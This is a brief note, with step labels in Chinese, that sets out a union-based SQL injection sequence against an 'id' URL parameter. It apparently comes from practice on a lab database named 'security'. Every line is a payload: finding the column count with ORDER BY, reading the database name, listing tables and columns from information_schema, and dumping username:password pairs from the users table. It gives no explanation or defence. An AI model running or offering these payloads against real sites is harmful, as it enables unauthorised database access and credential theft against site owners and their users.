找到表列数
?id=1 order by 3 -- +
得到当前库
?id=-1 union select 1,2,database()
得到所有表
?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema ='security'
得到users所有字段
?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name ='users'
得到name:password数据
?id=-1 union select 1,2,group_concat(username,':',password) from users
